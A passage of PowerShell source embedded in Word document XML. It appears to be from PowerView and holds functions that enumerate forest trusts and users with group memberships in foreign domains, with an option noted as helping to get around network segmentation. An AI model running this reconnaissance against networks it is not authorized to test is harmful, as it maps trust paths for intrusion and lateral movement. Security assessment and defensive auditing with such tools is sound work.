    <w:p w14:paraId="0CE08693" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C9760DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766BBF3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FoundForest = Get-NetForest -Forest $Forest -Credential $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E94C03C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4B9F8A73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($FoundForest) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428F30A6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $FoundForest.GetAllTrustRelationships() | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4A261A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $_.PSObject.TypeNames.Add('PowerView.ForestTrust')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A46618" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED9ED5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F30B60" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47082BFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8C0850" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A27AD84" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F389398" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7883049C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Find-ForeignUser {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5554BF12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F32ECAF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAEB291" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C0538F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Enumerates users who are in groups outside of their</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F676931" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        principal domain. The -Recurse option will try to map all </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3B7A9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        transitive domain trust relationships and enumerate all </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDB6540" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        users who are in groups outside of their principal domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8131B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A91B7E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134891CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="620E357F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Username to filter results for, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562722AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="366A2303" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CDED9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1720F9AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain to query for users, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67171552" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B99E2D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599F920A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59B27E4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA3FC55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="411410BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER LDAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D2DD8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="698A6195" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCE7887" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        More likely to get around network segmentation, but not as accurate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F2C65C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57B07FE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Recurse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2926A704" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AE21AD8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Enumerate all user trust groups from all reachable domains recursively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2CBADE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5209ADCA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585D01BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="031883F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8B0EBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="17C16678" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7184D319" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0FA34731" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://blog.harmj0y.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EEE5DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F51891" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2DBC3EE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C50D2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0796CC6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2CD546" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FEC54F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="09E42A3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11352507" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDA403B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="55DEE43C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E6B29A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475EB1DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16DA1EB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D810A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $LDAP,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24034117" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2BE4DD35" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06070988" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Recurse,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570560A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0458B923" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC3337A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9ABF44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8556B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E1A8D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1415FD38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    function Get-ForeignUser {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA01607" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # helper used to enumerate users who are in groups outside of their principal domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A79C55C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C954AD1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5663F915" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $UserName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54578D91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3DDEE5F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B282877" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA535DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="63108147" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3C75C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297E5BB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F910C7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A98FA2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C206AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $PageSize = 200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338730DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A0DC2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="539EC143" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6915DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # get the domain name into distinguished form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36786FB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DistinguishedDomainName = "DC=" + $Domain -replace '\.',',DC='</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456199D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C56A976" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AFF919" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DistinguishedDomainName = [String] ([adsi]'').distinguishedname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F3F6C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Domain = $DistinguishedDomainName -replace 'DC=','' -replace ',','.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4EB05F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D0E6F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14391E0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-NetUser -Domain $Domain -DomainController $DomainController -UserName $UserName -PageSize $PageSize -Filter '(memberof=*)' | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E42E77F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Membership in $_.memberof) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B7E49E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Index = $Membership.IndexOf("DC=")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CA4BCE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($Index) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCADF79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EC034C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupDomain = $($Membership.substring($Index)) -replace 'DC=','' -replace ',','.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D472205" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF1087C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if ($GroupDomain.CompareTo($Domain)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DF61D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # if the group domain doesn't match the user domain, output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B8C142" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $GroupName = $Membership.split(",")[0].split("=")[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDAC025" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ForeignUser = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320A03A4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ForeignUser | Add-Member Noteproperty 'UserDomain' $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453A66E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ForeignUser | Add-Member Noteproperty 'UserName' $_.samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8A417F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        $ForeignUser | Add-Member Noteproperty 'GroupDomain' $GroupDomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFF8AF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ForeignUser | Add-Member Noteproperty 'GroupName' $GroupName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C82F9DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ForeignUser | Add-Member Noteproperty 'GroupDN' $Membership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B8DF8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $ForeignUser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6490F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1A39C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2796A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CA8AB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66374080" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B26209" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0667F6EC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if ($Recurse) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7874C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # get all rechable domains in the trust mesh and uniquify them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7123F2B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($LDAP -or $DomainController) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B23582F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DomainTrusts = Invoke-MapDomainTrust -LDAP -DomainController $DomainController -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FAC6BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A6F4F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001052F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DomainTrusts = Invoke-MapDomainTrust -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4BA028" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294BCA84" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5BA502FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ForEach($DomainTrust in $DomainTrusts) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64706DCA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # get the trust groups for each domain in the trust mesh</w:t>
      </w:r>
    </w:p>
